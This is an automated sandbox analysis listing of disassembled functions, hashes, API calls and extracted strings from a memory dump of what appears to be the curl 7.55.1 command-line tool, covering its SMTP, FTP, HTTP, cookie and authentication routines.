Instruction ID: ddf91e787b485d29b833c9371a02df4270fbae9046b410f1dbba52082fdeb278
Opcode Fuzzy Hash: c04096f948adebf976991a9805ec52ce8d304ac47a3911ad3e4d168357decd78
Instruction Fuzzy Hash: 22F1B372E0860285EB24AB65D59427CEBA0FF4D744FD44139CB3E426D8DE7CE548E3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2F430 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 210COMMON

Download Yara Rule

Strings

MAIL failed: %d, xrefs: 00007FF7F8D2F745
DATA failed: %d, xrefs: 00007FF7F8D2F675
STARTTLS denied, code %d, xrefs: 00007FF7F8D2F57D
Remote access denied: %d, xrefs: 00007FF7F8D2F5BF
RCPT failed: %d, xrefs: 00007FF7F8D2F6F4
DATA, xrefs: 00007FF7F8D2F70E
Authentication cancelled, xrefs: 00007FF7F8D2F54F
Got unexpected smtp-server response: %d, xrefs: 00007FF7F8D2F5F4

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: Authentication cancelled$DATA$DATA failed: %d$Got unexpected smtp-server response: %d$MAIL failed: %d$RCPT failed: %d$Remote access denied: %d$STARTTLS denied, code %d
API String ID: 0-70694958
Opcode ID: d2c4d19fe057aa2d15e5593dbf51bc97d1597357cecf44d6bf4686180d85b2ea
Instruction ID: ac509a5d345ceaf238e814ad4a96950591ced56c1fee0d87146991033b58b7b0
Opcode Fuzzy Hash: d2c4d19fe057aa2d15e5593dbf51bc97d1597357cecf44d6bf4686180d85b2ea
Instruction Fuzzy Hash: F091D662A0CA0381FB74BB28D454678E251EF48790FD44532CA6E476D1CF3DE54EE7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0D1F4 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0D2CE
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0D330
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0D349

Strings

range overflow, xrefs: 00007FF7F8D0D3A9
unexpected close bracket, xrefs: 00007FF7F8D0D3DB
nested brace, xrefs: 00007FF7F8D0D3E4
out of memory, xrefs: 00007FF7F8D0D2DC
empty string within braces, xrefs: 00007FF7F8D0D3C1
unmatched brace, xrefs: 00007FF7F8D0D3ED

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _strdupmallocrealloc
String ID: empty string within braces$nested brace$out of memory$range overflow$unexpected close bracket$unmatched brace
API String ID: 178021264-3046722810
Opcode ID: 1559cd0f34d86321bd4e5d6e5933fa2503e8acd2b0e57d20846665f4110d6d6a
Instruction ID: 397ff3e792c6e9c4081b3c22bb8e7867ec5f6fee6e426fdd53b2151236c14b23
Opcode Fuzzy Hash: 1559cd0f34d86321bd4e5d6e5933fa2503e8acd2b0e57d20846665f4110d6d6a
Instruction Fuzzy Hash: 1F51BC32A08A818AE764DB25A440A7DE7A4FF08744F944236CABD87798CF38E0499364

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3AE58 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 142stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D3AE9A
_open.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D3AEED

Strings

Can't get the size of %s, xrefs: 00007FF7F8D3AF65
, xrefs: 00007FF7F8D3AF26
Can't open %s for writing, xrefs: 00007FF7F8D3AEF8

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _openstrchr
String ID: $Can't get the size of %s$Can't open %s for writing
API String ID: 174082288-3789703735
Opcode ID: 9911eb157b94b98a68b6795df6e5a78a1630acaaaba6a207328f8746794ac6f6
Instruction ID: 409aac5ca834446325befb5a1e4c0a8ce97c3aa8a60c0e38de046322ca13ad80
Opcode Fuzzy Hash: 9911eb157b94b98a68b6795df6e5a78a1630acaaaba6a207328f8746794ac6f6
Instruction Fuzzy Hash: DF51B362B0DE8281EB14AB25D4013BDE391FF88B90F984131DA6D477D5DF3CE409A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D22324 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 141fileCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D22371
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D223DD
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D223F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000000,00007FF7F8D215E4,?,?,?,?,?,?,?,00007FF7F8D19DD4), ref: 00007FF7F8D22426
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D22443
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?), ref: 00007FF7F8D22467

Strings

Set-Cookie:, xrefs: 00007FF7F8D224BB

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_funccallocfclosefopenfreemalloc
String ID: Set-Cookie:
API String ID: 2288824602-2427311273
Opcode ID: dd50c4d2b8d32825bb55764ea6ab04bb9949382792ad9dec23673867b9adca25
Instruction ID: e19c29d2689d2d231ed03f7721a32b1520aee565f72dcaf0bcabc8fae7bfc15e
Opcode Fuzzy Hash: dd50c4d2b8d32825bb55764ea6ab04bb9949382792ad9dec23673867b9adca25
Instruction Fuzzy Hash: E151E411A0D68685FB25BB21A810379D7907F2DB94FC80434EDBE067D1DE3CE54EA3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D361A8 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 92COMMON

Download Yara Rule

Strings

Offset (%I64d) was beyond file size (%I64d), xrefs: 00007FF7F8D3623B
ftp server doesn't support SIZE, xrefs: 00007FF7F8D36214
RETR %s, xrefs: 00007FF7F8D362FC
Maximum file size exceeded, xrefs: 00007FF7F8D361E1
REST %I64d, xrefs: 00007FF7F8D362D6
Instructs server to resume from offset %I64d, xrefs: 00007FF7F8D362C0
File already completely downloaded, xrefs: 00007FF7F8D3629A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID:
String ID: File already completely downloaded$Instructs server to resume from offset %I64d$Maximum file size exceeded$Offset (%I64d) was beyond file size (%I64d)$REST %I64d$RETR %s$ftp server doesn't support SIZE
API String ID: 0-1342433468
Opcode ID: 91aa478b2e9d7b878d355bd8dd58b0924fcaee5e0a83c64d5f32d24b3641e91c
Instruction ID: 65faa402ed3d06c91d7069bf26469f711f58c1ff6b3f0e2bfbd259ffe97d8d81
Opcode Fuzzy Hash: 91aa478b2e9d7b878d355bd8dd58b0924fcaee5e0a83c64d5f32d24b3641e91c
Instruction Fuzzy Hash: 15412161A0978281FB14AB25F5403B9E260EF4D7A4F844235DA7E4B6C5DF7CE108B3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D22AE0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D2168C: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000001,00007FF7F8D22B1A,?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D216A5

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22B34
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22B4A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4), ref: 00007FF7F8D22B94
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22BA2
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4), ref: 00007FF7F8D22BCB
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF7F8D19DD4,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D22BDB

Strings

# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00007FF7F8D22B43
## Fatal libcurl error, xrefs: 00007FF7F8D22BB7
%s, xrefs: 00007FF7F8D22B75

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: fclose$__acrt_iob_func_time64fopenfputsfree
String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s
API String ID: 1383513970-1525338603
Opcode ID: e3d50bc5cb7221297c70f51600728f0ab75f42ebdff02bbfe2d17ba2d816fd19
Instruction ID: 8e26ee5860e17a4b8aab40a212f99766efab35c9f432572cef5cc430a7c24660
Opcode Fuzzy Hash: e3d50bc5cb7221297c70f51600728f0ab75f42ebdff02bbfe2d17ba2d816fd19
Instruction Fuzzy Hash: 44316F20A0DA4281EB65BB11A810379E791AF4CB90FD80071DE6D077D9DF2CE849A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D027B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 201COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02817

Strings

CON, xrefs: 00007FF7F8D028B5
AUX, xrefs: 00007FF7F8D028E9
COM, xrefs: 00007FF7F8D02933
LPT, xrefs: 00007FF7F8D02949
NUL, xrefs: 00007FF7F8D028FF
CLOCK$, xrefs: 00007FF7F8D02919
PRN, xrefs: 00007FF7F8D028CF

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: malloc
String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
API String ID: 2803490479-925842913
Opcode ID: f9203dcf14122d08b6c06e7015c55c594028a73ca1ae6aed78f13cd572a09f9f
Instruction ID: 8e7d99d09baa6995c1e8e5fb22f61961ecd1884fb9cd50153e2435f6fedb8b13
Opcode Fuzzy Hash: f9203dcf14122d08b6c06e7015c55c594028a73ca1ae6aed78f13cd572a09f9f
Instruction Fuzzy Hash: 7E81B411A0D64341FB22BB51E4003FADA91AF5D7E4FC84131DEBE462D9EE2CE54DA3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D265D8 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 173COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D26669
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2670A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D26788

Strings

Switch from POST to GET, xrefs: 00007FF7F8D26845
Issue another request to this URL: '%s', xrefs: 00007FF7F8D267A2
GET, xrefs: 00007FF7F8D267F4
Maximum (%ld) redirects followed, xrefs: 00007FF7F8D26744
Disables POST, goes with %s, xrefs: 00007FF7F8D26806
%15[^?&/:]://%c, xrefs: 00007FF7F8D266BC
HEAD, xrefs: 00007FF7F8D267ED

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$malloc
String ID: %15[^?&/:]://%c$Disables POST, goes with %s$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET
API String ID: 2190258309-1733921125
Opcode ID: 1a21d5d9684b516ea9ff67633d1fccc164bd21274f2ebddc17af07331a320e0f
Instruction ID: ec0fe39a0451598a356b597eb49b2e71031392d3c13f30d26b7bcfdeabad621b
Opcode Fuzzy Hash: 1a21d5d9684b516ea9ff67633d1fccc164bd21274f2ebddc17af07331a320e0f
Instruction Fuzzy Hash: 3D71A3615097C286EB24BB25B4502BEE7E0FF48794F844135DEAE172D0DF3CE449A798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3A98C Relevance: 15.1, APIs: 4, Strings: 6, Instructions: 133stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,CONNECT,?,00000000,00000000,?,?,Digest,?,?,00007FF7F8D29DC3), ref: 00007FF7F8D3AA10
strchr.LIBVCRUNTIME ref: 00007FF7F8D3AA5E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,CONNECT,?,00000000,00000000,?,?,Digest,?,?,00007FF7F8D29DC3), ref: 00007FF7F8D3AB2F

Part of subcall function 00007FF7F8D40E90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D40F3A

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,CONNECT,?,00000000,00000000,?,?), ref: 00007FF7F8D3AB7C

Strings

Digest, xrefs: 00007FF7F8D3A98E
%.*s, xrefs: 00007FF7F8D3AA6B
CONNECT, xrefs: 00007FF7F8D3A997
Proxy-, xrefs: 00007FF7F8D3AB40
WDigest, xrefs: 00007FF7F8D3AAC2
%sAuthorization: Digest %s, xrefs: 00007FF7F8D3AB57

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$mallocstrchr
String ID: %.*s$%sAuthorization: Digest %s$CONNECT$Digest$Proxy-$WDigest
API String ID: 3005890304-799980647
Opcode ID: b4d05840df89775c666fa5cfed2c2c4428efe5547476a30764a13d5dcc0c65aa
Instruction ID: 0ddedb245f28e25a659a80f712ec8d31d7df033ded58ef850ec37fcf8e0f9c62
Opcode Fuzzy Hash: b4d05840df89775c666fa5cfed2c2c4428efe5547476a30764a13d5dcc0c65aa
Instruction Fuzzy Hash: D4518E22609B8691EB10AB16F8403BAE790FF49B94F884031DE5D473E4DF3CD449E798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2D223 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 250COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2D2BC

Strings

Content-Length:, xrefs: 00007FF7F8D2D11C
HTTP 1.0, assume close after body, xrefs: 00007FF7F8D2D04C
HTTP/%1d.%1d%c%3d, xrefs: 00007FF7F8D2CE92
HTTP/2 %d, xrefs: 00007FF7F8D2CEB5
Lying server, not serving HTTP/2, xrefs: 00007FF7F8D2CF0D
Server %s is blacklisted, xrefs: 00007FF7F8D2D290

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: HTTP/%1d.%1d%c%3d$ HTTP/2 %d$Content-Length:$HTTP 1.0, assume close after body$Lying server, not serving HTTP/2$Server %s is blacklisted
API String ID: 1294909896-1139449155
Opcode ID: d39bedb26836cdfebdd456c73846e8f7855019e14df3486f376ad4e848e6d463
Instruction ID: 115f2819ae44d2f9a0ef25d1d67823a2d754fba16fb8abf1f790efa0ddc53f35
Opcode Fuzzy Hash: d39bedb26836cdfebdd456c73846e8f7855019e14df3486f376ad4e848e6d463
Instruction Fuzzy Hash: C3C18032A0878A86EB64EB24D5406B9F7A0FF09750F944131CB6D836D1DF3CE459E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D3656C Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 128stringCOMMON

Download Yara Rule

APIs

isdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D36653
strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F8D36679

Strings

RETR response: %03d, xrefs: 00007FF7F8D365CC
Data conn was not available immediately, xrefs: 00007FF7F8D36710
, xrefs: 00007FF7F8D365DB
Getting file with size: %I64d, xrefs: 00007FF7F8D366D4
bytes, xrefs: 00007FF7F8D36629
Maxdownload = %I64d, xrefs: 00007FF7F8D366BD

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: isdigitstrtoll
String ID: $ bytes$Data conn was not available immediately$Getting file with size: %I64d$Maxdownload = %I64d$RETR response: %03d
API String ID: 4221162866-2096918210
Opcode ID: b900c6d4ef276404dccdd6a4971ba09839827865aad87a0e3b91fac2d47e7831
Instruction ID: 847480ad432116ac204599c76ad483220d993580abcb1138ccbe6181c15b55f5
Opcode Fuzzy Hash: b900c6d4ef276404dccdd6a4971ba09839827865aad87a0e3b91fac2d47e7831
Instruction Fuzzy Hash: 9E51E6A1A0C78281FB64AB25F540178E650AF4CBD4FD40276DA3D07AC5DF2CE549B3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D35524 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 00007FF7F8D35590
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D356E9

Strings

Could not seek stream, xrefs: 00007FF7F8D355E8
Failed to read data, xrefs: 00007FF7F8D356BA
STOR %s, xrefs: 00007FF7F8D356DB
File already completely uploaded, xrefs: 00007FF7F8D35676
APPE %s, xrefs: 00007FF7F8D356CD
SIZE %s, xrefs: 00007FF7F8D35586

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: APPE %s$Could not seek stream$Failed to read data$File already completely uploaded$SIZE %s$STOR %s
API String ID: 2941638530-2460033967
Opcode ID: 35d2f6084ad7585b2122fba229bcadaebe88b0c94ac0bf62a99e98bbbcc77b4f
Instruction ID: ccff0a1f2d6765f5d03c0fb62a074a2756f323e65ead086634f391880b8e6eef
Opcode Fuzzy Hash: 35d2f6084ad7585b2122fba229bcadaebe88b0c94ac0bf62a99e98bbbcc77b4f
Instruction Fuzzy Hash: 7A518862B097C686EB54AB25D9403A9E7A1FF48784F840131CE2D477D0DF7DE158A398

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D352EC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 00007FF7F8D3532C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D353F0
_cwprintf_s_l.LIBCMT ref: 00007FF7F8D35408
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D35422
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D35437

Strings

%s%s%s, xrefs: 00007FF7F8D353C5
LIST, xrefs: 00007FF7F8D353A2
NLST, xrefs: 00007FF7F8D3539B

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_cwprintf_s_lstrchr
String ID: %s%s%s$LIST$NLST
API String ID: 2810347522-959297966
Opcode ID: 926aaa9f5a9102dc8a02f26edabe0c2261238b94456cd8514f6f05b13b36622e
Instruction ID: 4b2bef53491215343f551cd3373b37ebcdd589bf4dadbab4a62c2815d191cea6
Opcode Fuzzy Hash: 926aaa9f5a9102dc8a02f26edabe0c2261238b94456cd8514f6f05b13b36622e
Instruction Fuzzy Hash: F7415121A0978685EB64AB11E95027DE7A0EF4DB90F880175CE2E077D1DF2CE409E3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D0B5B3 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F8D02C04: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D02C5C

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0B660

Part of subcall function 00007FF7F8D077B0: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB

Strings

curl_easy_cleanup(hnd);, xrefs: 00007FF7F8D0B6E3
out of memory, xrefs: 00007FF7F8D0B5D0, 00007FF7F8D0B675
curl/7.55.1, xrefs: 00007FF7F8D0B659
hnd = NULL;, xrefs: 00007FF7F8D0B6FA
proxy, xrefs: 00007FF7F8D0B63D
host, xrefs: 00007FF7F8D0B618
hnd = curl_easy_init();, xrefs: 00007FF7F8D0B5B3

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: _strdupfputsmalloc
String ID: curl/7.55.1$curl_easy_cleanup(hnd);$hnd = NULL;$hnd = curl_easy_init();$host$out of memory$proxy
API String ID: 2522119665-861652760
Opcode ID: 592eae184c67aac37ca0021fe992a8c0f832ade09a7e0f21f7ec28b7cf7977fa
